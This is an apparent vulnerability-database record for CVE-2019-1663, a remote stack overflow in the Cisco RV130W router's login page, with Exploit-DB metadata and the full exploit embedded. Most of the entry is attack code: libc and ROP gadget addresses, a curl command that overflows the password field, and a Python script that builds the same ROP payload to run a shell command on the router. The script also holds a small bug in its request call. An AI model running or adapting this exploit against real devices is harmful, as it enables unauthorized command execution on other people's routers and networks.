ID
VAR-E-201904-0029
CVE
cve_id: | CVE-2019-1663 | Trust: 2.5 |
EDB ID
46961
TITLE
Cisco RV130W 1.0.3.44 - Remote Stack Overflow - Hardware remote Exploit
Trust: 0.6
DESCRIPTION
Cisco RV130W 1.0.3.44 - Remote Stack Overflow. CVE-2019-1663 . remote exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | cisco | model: | rv130w | scope: | eq | version: | 1.0.3.44 | Trust: 1.6 |
vendor: | cisco | model: | rv130w routers management interface remote | scope: | - | version: | - | Trust: 0.5 |
vendor: | cisco | model: | rv110w rv130 rv215w remote | scope: | eq | version: | // | Trust: 0.5 |
vendor: | cisco | model: | rv130w remote | scope: | eq | version: | 1.0.3.44 | Trust: 0.5 |
EXPLOIT
#!/usr/bin/python
# Exploit Title: Cisco RV130W Remote Stack Overflow
# Google Dork: n/a
# Date: Advisory Published: Feb 2019
# Exploit Author: @0x00string
# Vendor Homepage: cisco.com
# Software Link: https://www.cisco.com/c/en/us/products/routers/rv130w-wireless-n-multifunction-vpn-router/index.html
# Version: 1.0.3.44 and prior
# Tested on: 1.0.3.44
# CVE : CVE-2019-1663
#
# 0x357fc000 - libc base addr
# 0x35849144 - system() addr
#
# 0x0002eaf8 / 0x3582AAF8: pop {r4, r5, lr}; add sp, sp, #8; bx lr;
# 0x0000c11c / 0x3580811C: mov r2, r4; mov r0, r2; pop {r4, r5, r7, pc};
# 0x00041308 / 0x3583D308: mov r0, sp; blx r2;
#
# gadget 1 system() junk gadget 2 junk junk junk junk junk gadget 3 text
# [0x3582AAF8][0x35849144][AAAA][0x3580811C][BBBB][CCCC][DDDD][EEEE][FFFF][0x3583D308][command]
#
# curl -k -X 'POST' --data "submit_button=login&submit_type=&gui_action=&default_login=1&wait_time=0&change_action=&enc=1&user=cisco&pwd=UUUUZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZVVVVWWWWXXXXYYYY`printf "\xf8\xaa\x82\x35\x44\x91\x84\x35AAAA\x1c\x81\x80\x35BBBBCCCCDDDDEEEEFFFF\x08\xd3\x83\x35ping 192.168.1.100\x00"`&sel_lang=EN" 'https://192.168.1.1:443/login.cgi'
#!/usr/bin/python
import requests
def banner():
print '''
@0x00string
0000000000000
0000000000000000000 00
00000000000000000000000000000
0000000000000000000000000000000
000000000 0000000000
00000000 0000000000
0000000 000000000000
0000000 000000000000000
000000 000000000 000000
0000000 000000000 000000
000000 000000000 000000
000000 000000000 000000
000000 00000000 000000
000000 000000000 000000
0000000 000000000 0000000
000000 000000000 000000
0000000000000000 0000000
0000000000000 0000000
00000000000 00000000
00000000000 000000000
0000000000000000000000000000000
00000000000000000000000000000
000 0000000000000000000
0000000000000
https://github.com/0x00string/oldays/blob/master/CVE-2019-1663.py
'''
def main():
banner()
command = "ping 192.168.1.100\x00"
print ("Sending exploit to execute [" + command + "]\n")
rop = "\xf8\xaa\x82\x35"+"\x44\x91\x84\x35"+"AAAA"+"\x1c\x81\x80\x35"+"BBBB"+"CCCC"+"DDDD"+"EEEE"+"FFFF"+"\x08\xd3\x83\x35"
payload = ("Z" * 446) + rop + command
url = "https://192.168.1.100:443/login.cgi"
data = {'submit_button': 'login','submit_type': '','gui_action': '','default_login': '1','wait_time': '0','change_action': '','enc': '1','user': 'cisco','pwd': payload,'sel_lang': 'EN'}
r = requests.post(url, payload=data)
if __name__ == "__main__":
main()
Trust: 1.0
EXPLOIT LANGUAGE
py
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Remote Stack Overflow
Trust: 1.6
TAGS
tag: | exploit | Trust: 1.5 |
tag: | remote | Trust: 1.5 |
tag: | web | Trust: 1.0 |
tag: | arbitrary | Trust: 1.0 |
tag: | overflow | Trust: 0.5 |
CREDITS
@0x00string
Trust: 0.6
EXTERNAL IDS
db: | NVD | id: | CVE-2019-1663 | Trust: 3.1 |
db: | EXPLOIT-DB | id: | 46961 | Trust: 1.6 |
db: | EDBNET | id: | 101568 | Trust: 0.6 |
db: | PACKETSTORM | id: | 152507 | Trust: 0.5 |
db: | PACKETSTORM | id: | 154310 | Trust: 0.5 |
db: | PACKETSTORM | id: | 153163 | Trust: 0.5 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2019-1663 | Trust: 2.5 |
url: | https://www.exploit-db.com/exploits/46961/ | Trust: 0.6 |
SOURCES
db: | PACKETSTORM | id: | 152507 |
db: | PACKETSTORM | id: | 154310 |
db: | PACKETSTORM | id: | 153163 |
db: | EXPLOIT-DB | id: | 46961 |
db: | EDBNET | id: | 101568 |
LAST UPDATE DATE
2022-07-27T09:26:51.978000+00:00
SOURCES RELEASE DATE
db: | PACKETSTORM | id: | 152507 | date: | 2019-04-14T21:28:54 |
db: | PACKETSTORM | id: | 154310 | date: | 2019-09-02T18:02:22 |
db: | PACKETSTORM | id: | 153163 | date: | 2019-06-04T04:44:44 |
db: | EXPLOIT-DB | id: | 46961 | date: | 2019-06-04T00:00:00 |
db: | EDBNET | id: | 101568 | date: | 2019-06-04T00:00:00 |